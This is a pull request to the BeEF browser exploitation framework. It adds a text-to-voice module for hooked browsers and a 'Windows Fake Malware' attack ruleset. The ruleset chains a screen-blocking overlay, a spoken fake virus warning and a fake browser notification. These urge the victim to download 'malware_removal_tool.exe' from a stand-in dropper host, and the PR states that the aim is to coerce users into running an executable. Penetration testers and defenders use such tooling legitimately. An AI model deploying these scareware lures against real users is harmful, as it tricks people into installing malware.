### PR TITLE
Add Text to Voice module

### DIFF
--- a/Gemfile
+++ b/Gemfile
@@ -30,6 +30,8 @@ gem 'dm-core'
 gem 'json'
 gem 'data_objects'
 gem 'rubyzip', '>= 1.0.0'
+gem 'espeak-ruby', '>= 1.0.3' # Text-to-Voice
+
 
 # SQLite support
 group :sqlite do

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -29,6 +29,7 @@ GEM
       eventmachine (>= 0.12.9)
       http_parser.rb (~> 0.6.0)
     erubis (2.7.0)
+    espeak-ruby (1.0.3)
     eventmachine (1.0.9.1)
     execjs (2.6.0)
     fastercsv (1.5.5)
@@ -94,6 +95,7 @@ DEPENDENCIES
   dm-sqlite-adapter
   em-websocket
   erubis
+  espeak-ruby (>= 1.0.3)
   eventmachine
   execjs
   geoip
@@ -112,4 +114,4 @@ DEPENDENCIES
   uglifier
 
 BUNDLED WITH
-   1.11.2
+   1.12.1

--- a/arerules/win_fake_malware.json
+++ b/arerules/win_fake_malware.json
@@ -1,0 +1,38 @@
+// note: update your dropper URL (dropper.local) in each of the modules below
+{
+  "name": "Windows Fake Malware",
+  "author": "bcoles",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "Windows",
+  "os_version": "ALL",
+  "modules": [
+    {
+      "name": "blockui",
+      "condition": null,
+      "options": {
+        "message": "<img src='data:image/png;base64,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'/><p>This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer before you do any shopping online. <p><a href='http://dropper.local/malware_removal_tool.exe' onclick='$j.unblockUI();'>Microsoft Malware Removal Toolkit</a></p>",
+        "timeout": "9999"
+      }
+    },
+    {
+      "name": "text_to_voice",
+      "condition": null,
+      "options": {
+        "message": "This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer; before you do any shopping online.",
+        "language": "en"
+      }
+    },
+    {
+      "name": "fake_notification_ie",
+      "condition": null,
+      "options": {
+        "url": "http://dropper.local/malware_removal_tool.exe",
+        "notification_text": "SECURITY WARNING: Download the <a href='http://dropper.local/malware_removal_tool.exe' title='Microsoft Malware Removal Toolkit'>Microsoft Malware Removal Toolkit</a> as soon as possible."
+      }
+    }
+  ],
+  "execution_order": [0,1,2],
+  "execution_delay": [0,0,0],
+  "chain_mode": "sequential"
+}

--- a/modules/social_engineering/text_to_voice/command.js
+++ b/modules/social_engineering/text_to_voice/command.js
@@ -1,0 +1,20 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {	
+
+  var url = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/msg-<%= @command_id %>.mp3';
+  try {
+    var sound = new Audio(url);
+    sound.play();
+    beef.debug('[Text to Voice] Playing mp3: ' + url);
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=message sent", beef.are.status_success());
+  } catch (e) {
+    beef.debug("[Text to Voice] HTML5 audio unsupported. Could not play: " + url);
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=audio not supported", beef.are.status_error());
+  }
+
+});

--- a/modules/social_engineering/text_to_voice/config.yaml
+++ b/modules/social_engineering/text_to_voice/config.yaml
@@ -1,0 +1,26 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        text_to_voice:
+            enable: true
+            category: "Social Engineering"
+            name: "Text to Voice"
+            description: "Convert text to mp3 and play it on the hooked browser. Note: this module requires Lame and eSpeak to be installed."
+            authors: ["bcoles"]
+            # http://caniuse.com/audio
+            target:
+                working: ["All"]
+                not_working:
+                    IE:
+                        min_ver: 1
+                        max_ver: 8
+                    FF:
+                        min_ver: 1
+                        max_ver: 2
+                    S:
+                        min_ver: 1
+                        max_ver: 3

--- a/modules/social_engineering/text_to_voice/module.rb
+++ b/modules/social_engineering/text_to_voice/module.rb
@@ -1,0 +1,74 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Text_to_voice < BeEF::Core::Command
+  require "espeak"
+  include ESpeak
+
+  def pre_send
+
+    # Ensure lame and espeak are installed
+    if IO.popen(['which', 'lame'], 'r').read.to_s.eql?('')
+      print_error("[Text to Voice] Lame is not in $PATH (apt-get install lame)")
+      return
+    end
+    if IO.popen(['which', 'espeak'], 'r').read.to_s.eql?('')
+      print_error("[Text to Voice] eSpeak is not in $PATH (apt-get install espeak)")
+      return
+    end
+
+    # Validate module options
+    message = nil
+    language = nil
+    @datastore.each do |input|
+      message  = input['value'] if input['name'] == 'message'
+      language = input['value'] if input['name'] == 'language'
+    end
+    unless Voice.all.map { |v| v.language }.include?(language)
+      print_error("[Text to Voice] Language '#{language}' is not supported")
+      print_more("Supported languages: #{Voice.all.map { |v| v.language }.join(',')}")
+      return
+    end
+
+    # Convert text to voice, encode as mp3 and write to module directory
+    begin
+      msg = Speech.new(message.to_s, voice: language)
+      mp3_path = "modules/social_engineering/text_to_voice/mp3/msg-#{@command_id}.mp3"
+      msg.save(mp3_path)
+    rescue => e
+      print_error("[Text to Voice] Could not create mp3: #{e.message}")
+      return
+    end
+
+    # Mount the mp3 to /objects/
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(
+      "/#{mp3_path}",
+      "/objects/msg-#{@command_id}",
+      'mp3')
+  end
+ 
+  def self.options
+    return [
+      { 'name'        => 'message',
+        'description' => 'Text to read',
+        'type'        => 'textarea',
+        'ui_label'    => 'Text',
+        'value'       => 'Hello; from beef',
+        'width'       => '400px' },
+      { 'name'        => 'language',
+        'description' => 'Language',
+        'type'        => 'text',
+        'ui_label'    => 'Language',
+        'value'       => 'en' }]
+  end
+
+  def post_execute     
+    content = {}
+    content['result'] = @datastore['result']          
+    save content   
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/objects/msg-#{@command_id}.mp3")
+  end
+  
+end


### PR DESCRIPTION
Fix #116

This PR adds a Text to Voice module. This module makes use of the espeak-ruby gem (which uses eSpeak for text-to-voice and Lame for MP3 encoding) to provide text-to-voice capabilities to BeEF.

An ARE rule is also provided: Windows Fake Malware. This ruleset makes use of the Fake Notification module and BlockUI in combination with the Text to Voice module in an attempt to coerce the user into running an executable.

### Chrome

![fake_malware_c49](https://cloud.githubusercontent.com/assets/434827/15270497/a38d8852-1a65-11e6-904a-efe71dd9814f.png)

### Firefox

![fake_malware_ff46](https://cloud.githubusercontent.com/assets/434827/15270499/a6e89366-1a65-11e6-9d68-924a809071b5.png)

### Internet Explorer 8
![fake_malware_ie8](https://cloud.githubusercontent.com/assets/434827/15270501/aa9b8b3a-1a65-11e6-9de0-b4597a156742.png)

### Internet Explorer 11
![fake_malware_ie11](https://cloud.githubusercontent.com/assets/434827/15270502/ada43200-1a65-11e6-8900-5ff699205d5b.png)

### Safari 5
![fake_malware_s5](https://cloud.githubusercontent.com/assets/434827/15270503/b048d1dc-1a65-11e6-9c15-493a0ef4700d.png)
